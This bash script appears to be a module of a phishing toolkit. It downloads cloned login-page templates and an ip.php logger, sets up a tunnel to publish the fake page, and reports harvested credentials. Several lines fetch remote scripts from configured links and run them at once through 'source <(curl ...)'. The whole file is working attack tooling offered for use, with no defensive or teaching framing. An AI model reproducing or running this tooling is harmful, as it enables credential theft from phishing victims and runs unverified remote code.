#!/usr/bin/bash

PHISHNAME=$(echo "PHISH/${sname}")

function setupRecourses () {
MODE=${PHISHNAME}
if [[ ! $__return__ == 105 ]];then
   source $DIR/programs/PHISH/credentials.site
   cd ${DIR}/server || exit 1
   SCRIPT_PATH=$(pwd)
   cd - &> /dev/null || exit 1
   bash ${CWD}/assets/programs/tunnel.installer
   source ${CWD}/assets/programs/tunnel.configure $3
   source ${DIR}/programs/PHISH/clone.url
else
   source <(curl -sLo- "${eRAWLINK}/programs/PHISH/credentials.site")
   cd $TMPDIR || exit 1
   if [ ! -d "$TMPDIR/server" ]
   then
   mkdir -p ${TMPDIR}/server
   fi
   cd server || exit 1
   SCRIPT_PATH=$(pwd)
   if [[ ! -d "${ARG_MS[${input} -1]}" ]]
   then
   printf "${b0SIGN} Downloading webpage Template...\r"
   svn checkout ${eGITLINK}/trunk/modules/${PHISHNAME}/"${ARG_MS[${input} -1]}" &> /dev/null
   fi
   cd ..
   cd ${TMPDIR}/server/"${ARG_MS[${input} -1]}" || exit 1
   printf "${b0SIGN} Downloading Programs for Starting Server...\r"
   curl -sLO ${eRAWLINK}/server/ip.php
   blank
   cd - &> /dev/null || exit 1
   source <(curl -sLo- "${RAWLINK}/assets/programs/tunnel.installer")
   source <(curl -sLo- "${RAWLINK}/assets/programs/tunnel.configure")
   source <(curl -sLo- "${eRAWLINK}/programs/PHISH/clone.url")
fi
}

function setupServer () {
if [[ ! $__return__ == 105 ]];then
cp -rf  "${MDIR}"/${PHISHNAME}/"${ARG_MS[${input} -1]}" "${DIR}/server"
cp "${SCRIPT_PATH[@]}"/ip.php "${SCRIPT_PATH[@]}"/"${ARG_MS[${input} -1]}"
cd "${SCRIPT_PATH[@]}"/"${ARG_MS[${input} -1]}" || exit 1
else
cd ${TMPDIR}/server/"${ARG_MS[${input} -1]}" || exit 1
fi
}

function startServer () {
get_input
clone_url

if [ ${#link} == 0 ]
then
exit 1
fi
sleep 0.5

echo -e "\n${b0SIGN} Credentials details visible here !\n"
}

if [[ ! $__return__ == 105 ]]
then
source ${PDIR}/${PHISHNAME}
else
echo "Unfortunately this module not supported in Online mode. (Due to GitLab)"
exit 0
#source <(curl -sLo- "${eRAWLINK}/programs/${PHISHNAME}")
fi
